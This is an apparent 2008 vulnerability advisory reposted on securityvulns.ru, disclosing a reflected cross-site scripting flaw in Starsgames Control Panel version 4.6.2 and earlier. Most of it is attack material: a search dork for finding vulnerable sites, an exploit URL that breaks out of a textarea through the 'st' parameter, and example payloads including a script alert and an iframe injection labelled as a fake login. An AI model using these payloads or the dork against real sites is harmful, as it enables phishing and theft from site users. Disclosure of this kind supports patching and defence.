Security Advisory: Starsgames Control Panel <= 4.6.2 Remote XSS Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [SECURITY] [DSA 1580-1] New phpgedview packages fix privilege escalation
  Vbulletin 3.7.0 Gold >> Sql injection on faq.php
  eCMS-v0.4.2 (SQL/PB) Multiple Remote Vulnerabilities
  AppServ Open Project < = 2.5.10 Remote XSS Vulnerability

From: tan_prathan_(at)_hotmail.com <tan_prathan_(at)_hotmail.com>
Date: 20.05.2008
Subject: Starsgames Control Panel <= 4.6.2 Remote XSS Vulnerability

==========================================================

Starsgames Control Panel <= 4.6.2 Remote XSS Vulnerability

==========================================================

AUTHOR : CWH Underground
DATE   : 19 May 2008
SITE   : www.citec.us

#####################################################
APPLICATION : Starsgames Control Panel
VERSION     : <= 4.6.2
DOWNLOAD    :
http://www.4shared.com/account/file/41140896/7ba9bd9a/sgcp462full.html]http://www
.4shared.com/account/file/411408...gcp462full.html
#####################################################

DORK: "starsgames control panel @2006"

---Exploit---

[-] http://[target]/index.php?showtopic=18&st=</textarea>[XSS]

=Example=

Alert:
[-] http://[target]/index.
php?showtopic=18&st=</textarea><script>alert(/xss/)</s
cript>

Iframe & Fake Login:
[-] http://[target]/index.php?showtopic=18&st=</textarea><iframe src=http://www.google.com>

Let's Fun...

##################################################################
Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C
##################################################################

test server